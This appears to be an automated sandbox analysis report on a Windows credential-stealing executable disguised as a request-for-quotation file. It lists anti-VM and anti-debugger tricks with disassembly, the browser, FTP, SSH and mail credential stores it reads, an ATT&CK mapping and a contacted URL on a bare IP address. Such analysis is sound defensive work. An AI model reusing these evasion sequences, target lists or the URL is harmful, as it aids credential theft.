Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256F63
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225F76E
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258B72 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02257F55 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258B58 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022547AE
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262795 NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02257FEE NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256FEB
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022547EA
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022583F7 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022523FB TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251FD0 TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022587DF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258C2B NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258035 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255837 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258864 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02254C69
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258068 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225847A NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251C4B TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A8B7 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225249F TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02254CE8
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022520FC TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022580CF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B0DF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258530 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225C133 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258D3F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258D14 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251D19 TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258118 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02254D74
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225BD7B NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225894C NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225814F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251D4B TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258557 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022575A7
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022581B0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256DB9
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022575BA NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022519BA TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251983 TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256D91
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022579E3
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262DF6
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251DF3 TerminateProcess,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022585F3 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262DF8
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022575C8

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 000000000225F19B second address: 000000000225AF91 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp ah, FFFFFFFDh 0x0000000d retn 0010h 0x00000010 test ah, dh 0x00000012 push eax 0x00000013 mov eax, 97C7811Ch 0x00000018 cmp eax, 97C7811Ch 0x0000001d jne 00007F60E0E87385h 0x00000023 pop eax 0x00000024 cmp dword ptr [esp+24h], 01h 0x00000029 jne 00007F60E0E91118h 0x0000002b inc dword ptr [ebp+00000140h] 0x00000031 jmp 00007F60E0E91162h 0x00000033 cmp dl, al 0x00000035 mov ebx, dword ptr [ebp+0000013Ch] 0x0000003b cmp ah, dh 0x0000003d mov dword ptr [esp+28h], ebx 0x00000041 mov ebx, dword ptr [ebp+00000140h] 0x00000047 pushad 0x00000048 mov cl, E2h 0x0000004a cmp cl, FFFFFFE2h 0x0000004d jne 00007F60E0E98AD9h 0x00000053 popad 0x00000054 add dword ptr [ebp+0000013Ch], ebx 0x0000005a cmp dx, bx 0x0000005d pushad 0x0000005e mov esi, 00000000h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 00000000022617FC second address: 00000000022617FC instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002252771 second address: 0000000002252771 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002259E0A second address: 0000000002259E0A instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002259FCE second address: 0000000002259FCE instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002258BF2 second address: 0000000002258BF2 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 00000000022592C7 second address: 00000000022592C7 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 00000000005675A8 second address: 00000000005675A8 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000000572AF9 second address: 0000000000572B66 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ebx, eax 0x0000000c jmp 00007F60E0E91162h 0x0000000e cmp bh, dh 0x00000010 test bh, bh 0x00000012 call 00007F60E0E90F8Fh 0x00000017 call 00007F60E0E91195h 0x0000001c nop 0x0000001d mov eax, dword ptr [esp] 0x00000020 inc eax 0x00000021 ret 0x00000022 ret 0x00000023 pushad 0x00000024 mov edi, 000000B1h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000000572E6B second address: 0000000000572E6B instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000000572DE7 second address: 0000000000572DE7 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RFQ No3756368.exe, 00000000.00000002.722020026.0000000002270000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: RFQ No3756368.exe, 00000000.00000002.722020026.0000000002270000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 000000000225F19B second address: 000000000225AF91 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp ah, FFFFFFFDh 0x0000000d retn 0010h 0x00000010 test ah, dh 0x00000012 push eax 0x00000013 mov eax, 97C7811Ch 0x00000018 cmp eax, 97C7811Ch 0x0000001d jne 00007F60E0E87385h 0x00000023 pop eax 0x00000024 cmp dword ptr [esp+24h], 01h 0x00000029 jne 00007F60E0E91118h 0x0000002b inc dword ptr [ebp+00000140h] 0x00000031 jmp 00007F60E0E91162h 0x00000033 cmp dl, al 0x00000035 mov ebx, dword ptr [ebp+0000013Ch] 0x0000003b cmp ah, dh 0x0000003d mov dword ptr [esp+28h], ebx 0x00000041 mov ebx, dword ptr [ebp+00000140h] 0x00000047 pushad 0x00000048 mov cl, E2h 0x0000004a cmp cl, FFFFFFE2h 0x0000004d jne 00007F60E0E98AD9h 0x00000053 popad 0x00000054 add dword ptr [ebp+0000013Ch], ebx 0x0000005a cmp dx, bx 0x0000005d pushad 0x0000005e mov esi, 00000000h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 00000000022617FC second address: 00000000022617FC instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002251000 second address: 000000000225103B instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 jmp 00007F60E0E91277h 0x00000008 call 00007F60E0E90FBAh 0x0000000d test dl, dl 0x0000000f pop ebx 0x00000010 xor edx, edx 0x00000012 mov dword ptr [ebp+00000269h], eax 0x00000018 cmp ah, bh 0x0000001a mov eax, edx 0x0000001c push eax 0x0000001d test cx, dx 0x00000020 mov eax, dword ptr [ebp+00000269h] 0x00000026 test ch, ch 0x00000028 mov dword ptr [ebp+00000180h], ecx 0x0000002e mov ecx, esp 0x00000030 pushad 0x00000031 lfence 0x00000034 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 000000000225252A second address: 0000000002252654 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp cl, al 0x00000005 push BD0A4E02h 0x0000000a jmp 00007F60E0D0C35Eh 0x0000000c test cl, cl 0x0000000e xor dword ptr [esp], D5EC934Eh 0x00000015 xor dword ptr [esp], 0003E4B4h 0x0000001c test bx, bx 0x0000001f xor dword ptr [esp], 68E539F8h 0x00000026 test cx, cx 0x00000029 cmp cl, bl 0x0000002b test dl, bl 0x0000002d test dx, ax 0x00000030 mov dword ptr [ebp+00000258h], edi 0x00000036 test ch, ah 0x00000038 mov edi, 2258711Bh 0x0000003d pushad 0x0000003e mov eax, 00000048h 0x00000043 cpuid 0x00000045 popad 0x00000046 cmp dx, cx 0x00000049 xor edi, 9F23BF14h 0x0000004f cmp cl, 00000064h 0x00000052 xor edi, 3CAFA227h 0x00000058 cmp bh, dh 0x0000005a add edi, 7E2B93DCh 0x00000060 jmp 00007F60E0D0C35Eh 0x00000062 test bl, dl 0x00000064 push edi 0x00000065 test al, dl 0x00000067 mov edi, dword ptr [ebp+00000258h] 0x0000006d push ebx 0x0000006e mov ebx, 8739F797h 0x00000073 cmp ebx, 8739F797h 0x00000079 jne 00007F60E0D0AE3Fh 0x0000007f pop ebx 0x00000080 test edx, edx 0x00000082 mov edx, ebp 0x00000084 test ah, ah 0x00000086 add edx, 0000009Ch 0x0000008c pushad 0x0000008d mov edx, 000000F8h 0x00000092 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002252654 second address: 0000000002252771 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+000001D1h], ebx 0x00000009 cmp cl, al 0x0000000b mov ebx, edx 0x0000000d push ebx 0x0000000e push ebx 0x0000000f mov ebx, 08B7EE63h 0x00000014 cmp ebx, 08B7EE63h 0x0000001a jne 00007F60E0E8FC0Ch 0x00000020 pop ebx 0x00000021 mov ebx, dword ptr [ebp+000001D1h] 0x00000027 test edx, edx 0x00000029 cmp ebx, eax 0x0000002b test eax, ebx 0x0000002d push 81563C8Ch 0x00000032 sub dword ptr [esp], 8E0BADA3h 0x00000039 xor dword ptr [esp], BFF76532h 0x00000040 jmp 00007F60E0E91162h 0x00000042 cmp bl, al 0x00000044 sub dword ptr [esp], 4CBDEBD4h 0x0000004b mov dword ptr [ebp+0000018Bh], edi 0x00000051 mov edi, EC945BB2h 0x00000056 cmp cx, cx 0x00000059 sub edi, 1D2AA9F5h 0x0000005f test dl, cl 0x00000061 add edi, EC99B4B4h 0x00000067 test dx, ax 0x0000006a sub edi, BC036672h 0x00000070 test edx, edx 0x00000072 push edi 0x00000073 mov edi, dword ptr [ebp+0000018Bh] 0x00000079 jmp 00007F60E0E9115Eh 0x0000007b test eax, E3D2353Dh 0x00000080 pushad 0x00000081 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002252771 second address: 0000000002252771 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002259E0A second address: 0000000002259E0A instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002259FCE second address: 0000000002259FCE instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002258BF2 second address: 0000000002258BF2 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000002258E4E second address: 0000000002258F03 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push dword ptr [ebp+0000010Ch] 0x00000011 mov dword ptr [ebp+000001DEh], ecx 0x00000017 cmp edx, eax 0x00000019 mov ecx, 6D020D6Bh 0x0000001e cmp al, cl 0x00000020 xor ecx, 4AA8B80Dh 0x00000026 cmp cl, al 0x00000028 xor ecx, C4FEE94Ah 0x0000002e test ax, ax 0x00000031 test eax, 0403C7AFh 0x00000036 sub ecx, E2545C2Ch 0x0000003c test bl, bl 0x0000003e push ecx 0x0000003f test dx, 3D88h 0x00000044 mov ecx, dword ptr [ebp+000001DEh] 0x0000004a cmp bx, bx 0x0000004d cmp bx, cx 0x00000050 push F0DF92D6h 0x00000055 jmp 00007F60E0D0C35Eh 0x00000057 cmp dx, 9FB2h 0x0000005c test al, dl 0x0000005e xor dword ptr [esp], 74282A12h 0x00000065 pushad 0x00000066 lfence 0x00000069 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 00000000022592C7 second address: 00000000022592C7 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000000561000 second address: 000000000056103B instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 jmp 00007F60E0D0C477h 0x00000008 call 00007F60E0D0C1BAh 0x0000000d test dl, dl 0x0000000f pop ebx 0x00000010 xor edx, edx 0x00000012 mov dword ptr [ebp+00000269h], eax 0x00000018 cmp ah, bh 0x0000001a mov eax, edx 0x0000001c push eax 0x0000001d test cx, dx 0x00000020 mov eax, dword ptr [ebp+00000269h] 0x00000026 test ch, ch 0x00000028 mov dword ptr [ebp+00000180h], ecx 0x0000002e mov ecx, esp 0x00000030 pushad 0x00000031 lfence 0x00000034 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 000000000056252A second address: 0000000000562654 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp cl, al 0x00000005 push BD0A4E02h 0x0000000a jmp 00007F60E0E9115Eh 0x0000000c test cl, cl 0x0000000e xor dword ptr [esp], D5EC934Eh 0x00000015 xor dword ptr [esp], 0003E4B4h 0x0000001c test bx, bx 0x0000001f xor dword ptr [esp], 68E539F8h 0x00000026 test cx, cx 0x00000029 cmp cl, bl 0x0000002b test dl, bl 0x0000002d test dx, ax 0x00000030 mov dword ptr [ebp+00000258h], edi 0x00000036 test ch, ah 0x00000038 mov edi, 2258711Bh 0x0000003d pushad 0x0000003e mov eax, 00000048h 0x00000043 cpuid 0x00000045 popad 0x00000046 cmp dx, cx 0x00000049 xor edi, 9F23BF14h 0x0000004f cmp cl, 00000064h 0x00000052 xor edi, 3CAFA227h 0x00000058 cmp bh, dh 0x0000005a add edi, 7E2B93DCh 0x00000060 jmp 00007F60E0E9115Eh 0x00000062 test bl, dl 0x00000064 push edi 0x00000065 test al, dl 0x00000067 mov edi, dword ptr [ebp+00000258h] 0x0000006d push ebx 0x0000006e mov ebx, 8739F797h 0x00000073 cmp ebx, 8739F797h 0x00000079 jne 00007F60E0E8FC3Fh 0x0000007f pop ebx 0x00000080 test edx, edx 0x00000082 mov edx, ebp 0x00000084 test ah, ah 0x00000086 add edx, 0000009Ch 0x0000008c pushad 0x0000008d mov edx, 000000F8h 0x00000092 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 00000000005675A8 second address: 00000000005675A8 instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 000000000056774D second address: 0000000000567765 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 6F136E65h 0x00000012 pushad 0x00000013 mov eax, 000000C7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000000567765 second address: 000000000056788C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 xor dword ptr [esp], F50948E9h 0x0000000a pushad 0x0000000b mov cx, B7EEh 0x0000000f cmp cx, B7EEh 0x00000014 jne 00007F60E0D05D84h 0x0000001a popad 0x0000001b test ch, 0000007Ah 0x0000001e sub dword ptr [esp], 15DB40ECh 0x00000025 sub dword ptr [eax+18h], 00001000h 0x0000002c add eax, 18h 0x0000002f test ebx, edx 0x00000031 mov dword ptr [ebp+00000192h], esi 0x00000037 test dh, dh 0x00000039 mov esi, eax 0x0000003b cmp ebx, edx 0x0000003d push esi 0x0000003e cmp ax, ax 0x00000041 mov esi, dword ptr [ebp+00000192h] 0x00000047 sub eax, 04h 0x0000004a add dword ptr [eax], 00001000h 0x00000050 mov dword ptr [ebp+00000264h], ecx 0x00000056 jmp 00007F60E0D0C362h 0x00000058 nop 0x00000059 mov ecx, eax 0x0000005b push ecx 0x0000005c mov ecx, dword ptr [ebp+00000264h] 0x00000062 cmp ax, cx 0x00000065 mov dword ptr [ebp+00000264h], edx 0x0000006b mov edx, BB9111C3h 0x00000070 jmp 00007F60E0D0C360h 0x00000072 test edx, ecx 0x00000074 xor edx, 85DB8D00h 0x0000007a test dx, dx 0x0000007d xor edx, 6C94A041h 0x00000083 pushad 0x00000084 mov edx, 00000061h 0x00000089 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000000572AF9 second address: 0000000000572B66 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov ebx, eax 0x0000000c jmp 00007F60E0E91162h 0x0000000e cmp bh, dh 0x00000010 test bh, bh 0x00000012 call 00007F60E0E90F8Fh 0x00000017 call 00007F60E0E91195h 0x0000001c nop 0x0000001d mov eax, dword ptr [esp] 0x00000020 inc eax 0x00000021 ret 0x00000022 ret 0x00000023 pushad 0x00000024 mov edi, 000000B1h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000000572E6B second address: 0000000000572E6B instructions:
Source: C:\Users\user\Desktop\RFQ No3756368.exe	RDTSC instruction interceptor: First address: 0000000000572DE7 second address: 0000000000572DE7 instructions:

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Code function: 0_2_0225E27F rdtsc

Source: C:\Users\user\Desktop\RFQ No3756368.exe TID: 2628	Thread sleep count: 176 > 30
Source: C:\Users\user\Desktop\RFQ No3756368.exe TID: 4044	Thread sleep time: -60000s >= -30000s

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Thread delayed: delay time: 60000

Source: RFQ No3756368.exe, 00000000.00000002.722020026.0000000002270000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWK
Source: RFQ No3756368.exe, 00000000.00000002.722020026.0000000002270000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Show sources

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225767C Start: 0225788C End: 02257765
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022576FE Start: 0225788C End: 02257765
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022575BA Start: 02262B66 End: 02257765
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022575C8 Start: 0225788C End: 02257765

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Code function: 0_2_0225E27F rdtsc

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Code function: 0_2_0225C4DE LdrInitializeThunk,

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256710 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256712 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255837 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226083D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02260843 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225E880 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A0FC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226091C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225F1B5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256DB9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256D91 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Process created: C:\Users\user\Desktop\RFQ No3756368.exe 'C:\Users\user\Desktop\RFQ No3756368.exe'

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Code function: 0_2_02262A72 cpuid

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\RFQ No3756368.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\RFQ No3756368.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection11	Masquerading1	OS Credential Dumping2	Security Software Discovery621	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion221	Credentials in Registry1	Virtualization/Sandbox Evasion221	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	Remote System Discovery1	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Information Discovery313	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol114	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
RFQ No3756368.exe	26%	Virustotal		Browse
RFQ No3756368.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://63.141.228.141/32.php/nuldTOn9SBn3G	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
